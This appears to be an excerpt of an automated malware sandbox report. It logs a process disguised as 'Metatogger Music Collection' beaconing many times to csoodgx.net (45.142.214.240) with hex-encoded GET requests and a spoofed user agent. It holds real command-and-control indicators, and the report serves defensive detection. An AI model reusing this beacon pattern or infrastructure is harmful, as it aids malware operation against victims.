Date: Fri, 29 Mar 2024 11:10:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 49781 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:38.765183926 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:39.078337908 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.5 | 49782 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:39.408448935 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:39.723113060 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.5 | 49783 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:40.060558081 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:40.373763084 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:40.482719898 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:40.780415058 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:40.888750076 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:41.193089008 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.5 | 49784 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:41.536693096 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:41.836251974 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 49785 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:42.173449993 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:42.475572109 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 49786 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:42.810591936 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:43.107403040 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Mar 29, 2024 12:10:43.222188950 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:43.525003910 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 49787 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:43.860066891 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:44.182424068 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 49788 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:45.795139074 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:46.095664024 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 49789 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:46.435554028 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:46.739310026 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.5 | 49790 | 45.142.214.240 | 80 | 6408 | C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

Timestamp | Bytes transferred | Direction | Data
Mar 29, 2024 12:10:47.079530954 CET | 326 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
Host: csoodgx.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mar 29, 2024 12:10:47.384391069 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 29 Mar 2024 11:10:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                                          Session ID:74
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49791
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:47.724355936 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:48.019238949 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:47 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:75
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49792
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:48.356929064 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:48.680064917 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:48 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:76
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49793
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:49.012408018 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:49.311074972 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:77
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49794
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:49.656204939 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:49.952958107 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:78
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49795
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:50.283368111 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:50.587368011 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:79
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49796
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:50.920566082 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:51.221873999 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:80
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49797
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:51.565444946 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:51.887362957 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:81
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49798
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:52.218008041 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:52.519275904 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:82
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49799
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:52.864072084 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:53.167071104 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:53 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session ID:83
                                                                          Source IP:192.168.2.5
                                                                          Source Port:49800
                                                                          Destination IP:45.142.214.240
                                                                          Destination Port:80
                                                                          PID:6408
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Timestamp:Mar 29, 2024 12:10:53.501609087 CET
                                                                          Bytes transferred:326
                                                                          Direction:OUT
                                                                          Data:
                                                                          GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

                                                                          Timestamp:Mar 29, 2024 12:10:53.809508085 CET
                                                                          Bytes transferred:220
                                                                          Direction:IN
                                                                          Data:
                                                                          HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:53 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20



                                                                          Target ID:0
                                                                          Start time:12:08:48
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
